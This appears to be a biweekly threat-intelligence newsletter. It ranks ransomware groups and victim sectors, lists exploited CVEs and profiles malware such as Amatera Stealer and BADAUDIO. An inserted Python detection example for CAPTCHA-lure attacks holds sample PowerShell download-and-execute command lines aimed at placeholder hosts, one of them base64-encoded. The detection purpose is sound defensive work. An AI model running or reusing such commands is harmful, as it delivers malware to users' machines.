Executive Summary
Qilin leads ransomware activity this period, with CL0P and Akira close behind. Newer and mid-tier groups like Sinobi and DragonForce show rising impact. Victims are primarily small US-based businesses, with manufacturing, technology, retail, and construction most affected.
Report Links
Download Threat Brief For November 16-30 2025
Byer-Nichols Threat Brief Podcast 11-30-2025
Ransomware Actors
| Ransomware | Percentage | Rank Last Period | Rank Two Periods Ago |
|---|---|---|---|
| Qilin | 19.74% | 1 | 1 |
| CL0P | 17.11% | 5 | 4 |
| Akira | 16.84% | 2 | 2 |
| Sinobi | 4.74% | 16 | 3 |
| DragonForce | 4.74% | 13 | 10 |
Qilin leads activity, with CL0P and Akira remaining major threats. Manufacturing, tech, retail, and construction top victim sectors, with small US-based businesses hit hardest. Canada rises in activity; Thailand and Germany appear as new hotspots.
Victim Sector
| Sector | Percentage | Rank Last Period | Rank Movement |
|---|---|---|---|
| Manufacturing | 19.47% | 1 | Unchanged |
| Technology | 13.95% | 2 | Unchanged |
| Retail | 13.16% | 5 | 5 -> 3 |
| Construction | 12.37% | 4 | Unchanged |
| Financial services | 10.53% | 3 | 3 -> 5 |
Victim Location
| Country | Percentage | Rank Last Period | Rank Movement |
|---|---|---|---|
| USA | 56.58% | 1 | Unchanged |
| Canada | 7.37% | 5 | 5 -> 2 |
| Thailand | 2.63% | New | New entry |
| Germany | 2.63% | New | New entry |
| UK | 2.11% | 3 | 3 -> 5 |
Victim Org Size
| Size (employees) | This Period | Last Period |
|---|---|---|
| Small Business (500 or fewer) | 72.30% | 70.03% |
| Mid-Market (501-5000) | 16.62% | 19.58% |
| Large Enterprise (5000+) | 11.08% | 10.39% |
Trending Adversaries
Trending adversaries blend state-aligned and criminal operations, spanning espionage, sabotage, and financial intrusion. Groups active this period show growing geopolitical alignment and disruptive capability, reinforcing the need to track how quickly these actors pivot between intelligence collection and monetization.
- APT24
- Autumn Dragon
- Bloody Wolf
- Dragon Breath
- PlushDaemon
- TridentLocker
Trending & Actively Exploited Vulnerabilities
| CVE | Vendor | Product |
|---|---|---|
| CVE-2021-26829 | OpenPLC | ScadaBR |
| CVE-2025-13223 | Chromium | V8 |
| CVE-2025-40601 | SonicWall | SonicOS SSLVPN |
| CVE-2025-50165 | Microsoft | Windows Graphics Component |
| CVE-2025-58034 | Fortinet | FortiWeb |
| CVE-2025-61757 | Oracle | Fusion Middleware |
| CVE-2025-64459 | Django Project | Django |
| CVE-2025-64755 | Anthropic | Code AI |
| CVE-2025-8088 | RARLAB | WinRAR |
| CVE-2025-9501 | BoldGrid | W3 Total Cache WordPress plugin |
Trending Malware
| Trending Malware | Details |
|---|---|
| Amatera Stealer | Amatera Stealer is an advanced evolution of the ACR Stealer delivered as Malware-as-a-Service, designed to evade modern monitoring and defense mechanisms while stealing highly sensitive data. It spreads mainly through compromised websites that use deceptive CAPTCHA-style social engineering to trick users into executing hidden PowerShell commands, which silently download the malware. Its infection chain relies on multi-stage, heavily obfuscated scripts and legitimate processes, making detection and forensic analysis difficult. |
| BADAUDIO | BADAUDIO is a C++ first-stage downloader that retrieves, decrypts, and executes AES-encrypted payloads (such as Cobalt Strike Beacon) from a hard-coded C2 server. It collects basic host details, encrypts them with a built-in AES key, and embeds this data in a cookie within its C2 request to quietly identify infected systems. The malware employs control-flow flattening, an obfuscation technique that breaks normal program logic to hinder automated and manual reverse engineering. It is typically delivered as a malicious DLL using DLL search-order hijacking, supported by VBS, BAT, and LNK files that automate placement, persistence, and sideloading through legitimate executables. This multi-layered, stealth-focused execution chain minimizes obvious indicators of compromise and complicates detection. |
| RondoDox | RondoDox is a stealthy botnet campaign that compromises internet-facing routers, DVRs, CCTV systems, and other network devices by exploiting multiple long-standing command-injection vulnerabilities. Initially focused on TBK DVRs and Four-Faith routers via CVE-2024-3721 and CVE-2024-12856, it has since expanded into a broader, multi-vector operation. The malware now leverages a “loader-as-a-service” model, bundling RondoDox with Mirai and Morte payloads to increase reach and persistence. Its tooling continues to grow, incorporating additional CVEs (including several now listed in CISA’s KEV catalog), making exploitation faster and patching more urgent. Overall, RondoDox represents an evolving, multi-architecture loader ecosystem targeting a wide range of vulnerable edge devices. |
| RONINGLOADER | RONINGLOADER is a multi-stage malware loader used by the Dragon Breath (APT-Q-27) group, delivered through trojanized NSIS installers impersonating legitimate apps such as Google Chrome and Microsoft Teams. The loader incorporates numerous evasion techniques specifically tailored to bypass popular Chinese endpoint security products, including abusing Protected Process Light (PPL) to disable Microsoft Defender and deploying a validly signed kernel driver to terminate security processes. It also applies custom WDAC policies to block tools such as 360 Total Security and Huorong, and uses phantom DLLs plus thread-pool-based payload injection to further neutralize defenses. The campaign targets Chinese-speaking users and represents an evolution of earlier Dragon Breath activity, culminating in the delivery of a slightly updated gh0st RAT variant. Overall, RONINGLOADER demonstrates a highly resilient and defense-aware approach to gaining and maintaining system access. |
| ShadowV2 | ShadowV2 is a sophisticated malware campaign that hijacks exposed Docker daemons, mainly on AWS EC2, using a Python-based spreader and multi-stage container deployment. It relies on a GitHub Codespaces-hosted C2 framework and a Go-based RAT to execute commands and maintain communication. What makes it stand out is its advanced DDoS toolkit, including HTTP/2 rapid reset and Cloudflare bypass techniques, which mimic a “DDoS-as-a-service” platform. The risk it poses is enabling attackers to launch large-scale, cloud-native denial-of-service attacks that can overwhelm business infrastructure and disrupt operations. |
| Sturnus | Sturnus is a newly discovered Android banking Trojan that tricks users by mimicking legitimate financial apps and stealing sensitive data. It abuses Accessibility Services to capture screens, bypasses messaging protections, and uses fake overlays to harvest login credentials. With keylogging, screen recording, and remote-control features, attackers can secretly access accounts and even initiate fraudulent transactions. |
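The Amatera Stealer entry above describes a CAPTCHA-style lure that gets the user to paste a hidden, downloading PowerShell command into the Run dialog. The following is an added detection example, not code from the report or from any vendor: it scores constructed process-creation events (Sysmon Event ID 1 style) for exactly that shape, PowerShell spawned by explorer.exe with hidden-window or encoded-command flags and a download cradle, and it decodes `-EncodedCommand` so the cradle is found even when base64-wrapped. The event field names, sample command lines and `.invalid` URLs are assumptions made up for the example.

```python
import base64
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified);
# made-up telemetry for illustration, with URLs on the reserved .invalid TLD.
_ENC = base64.b64encode("iex (iwr http://example.invalid/y)".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -nop -c "iwr http://example.invalid/x | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -enc " + _ENC},           # cradle hidden inside base64
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -c Get-Date"},            # benign interactive use
    {"ParentImage": r"C:\Program Files\Vendor\agent.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr http://update.example.invalid/ | iex"'},
]
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDE_FLAGS = re.compile(r"-(?:windowstyle|win|w)\s+hidden|-nop\b|-noni\b", re.I)
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE = re.compile(r"\b(?:iwr|invoke-webrequest|iex|invoke-expression|downloadstring|"
                    r"downloadfile|net\.webclient|start-bitstransfer)\b", re.I)

def decode_encoded_command(cmdline):
    # -EncodedCommand carries base64 of UTF-16LE script; return its plaintext or ''.
    m = ENC_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def score_event(ev):
    # Only PowerShell launched from the user's shell (Win+R / Run dialog) is in scope.
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if image not in POWERSHELL or parent != "explorer.exe":
        return []
    cmd = ev["CommandLine"]
    decoded = decode_encoded_command(cmd)  # inspect the payload, not just the flag
    reasons = []
    if HIDE_FLAGS.search(cmd):
        reasons.append("hidden/non-interactive flags")
    if decoded:
        reasons.append("encoded command")
    if CRADLE.search(cmd + " " + decoded):
        reasons.append("download cradle")
    return reasons

def find_clickfix_candidates(events):
    # (index, reasons) for every in-scope event with at least one suspicious trait.
    return [(i, score_event(e)) for i, e in enumerate(events) if score_event(e)]
```

The fourth sample event is deliberately out of scope: hidden PowerShell from a non-interactive parent deserves its own rule with a different baseline, so this one stays narrow enough to keep analyst noise low.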
Top News
- Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses
- California man admits to laundering crypto stolen in $230M heist
- Cloudflare hit by outage affecting global network services, points to database issue
- Code beautifiers expose credentials from financial, government and technology organizations
- Crypto mixer founders sent to prison for laundering over $237 million
- Cybercriminals stole $262M by impersonating bank support teams
- New WrtHug campaign hijacks thousands of end-of-life ASUS routers
- Russian bulletproof hosting provider sanctioned over ransomware ties
Contributors
Written by Jeremy Nichols, former Director of the Global Threat Intelligence Center
Executive Summaries & Adversary Bios by Geoff Rehmet, Cybersecurity Expert
Produced & Distributed by Byer Co Cybersecurity Marketing Division (aka Phish Tank Digital)